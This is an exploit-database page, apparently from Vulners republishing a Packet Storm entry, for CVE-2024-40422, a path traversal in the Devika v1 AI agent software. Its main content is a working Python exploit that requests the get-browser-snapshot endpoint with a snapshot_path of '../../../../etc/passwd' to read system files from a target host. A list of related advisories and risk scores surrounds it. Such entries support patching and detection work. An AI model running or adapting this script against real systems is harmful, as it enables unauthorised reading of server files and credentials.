Lucene search
+L

Devika 1 Path Traversal

🗓️ 05 Aug 2024 00:00:00Reported by Alperen ErgelType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 295 Views

Devika v1 - Path Traversal via 'snapshot_path' Parameter. Exploits directory traversal vulnerability

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Devika v1 - Path Traversal via (snapshot_path) Exploit
4 Aug 202400:00
zdt
githubexploit
GithubExploit
Exploit for Path Traversal in Stitionai Devika
2 Aug 202614:52
githubexploit
githubexploit
GithubExploit
Exploit for Cross-site Scripting in Flatpress
28 Jan 202521:16
githubexploit
githubexploit
GithubExploit
Exploit for Path Traversal in Stitionai Devika
6 Aug 202407:09
githubexploit
circl
Circl
CVE-2024-40422
24 Jul 202419:09
circl
cnnvd
CNNVD
Devika 路径遍历漏洞
24 Jul 202400:00
cnnvd
cve
CVE
CVE-2024-40422
24 Jul 202400:00
cve
cvelist
Cvelist
CVE-2024-40422
24 Jul 202400:00
cvelist
exploitdb
Exploit DB
Devika v1 - Path Traversal via 'snapshot_path'
4 Aug 202400:00
exploitdb
nuclei
Nuclei
Devika v1 - Path Traversal
9 Aug 202618:22
nuclei
Rows per page
`# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter  
# Google Dork: N/A  
# Date: 2024-06-29  
# Exploit Author: Alperen Ergel  
# Contact: @alpernae (IG/X)  
# Vendor Homepage: https://devikaai.co/  
# Software Link: https://github.com/stitionai/devika  
# Version: v1  
# Tested on: Windows 11 Home Edition  
# CVE: CVE-2024-40422  
  
#!/usr/bin/python  
  
import argparse  
import requests  
  
def exploit(target_url):  
url = f'http://{target_url}/api/get-browser-snapshot'  
params = {  
'snapshot_path': '../../../../etc/passwd'  
}  
  
response = requests.get(url, params=params)  
print(response.text)  
  
if __name__ == "__main__":  
parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')  
parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)  
args = parser.parse_args()  
  
exploit(args.target)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Aug 2024 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.19.1
EPSS0.11323
SSVC
295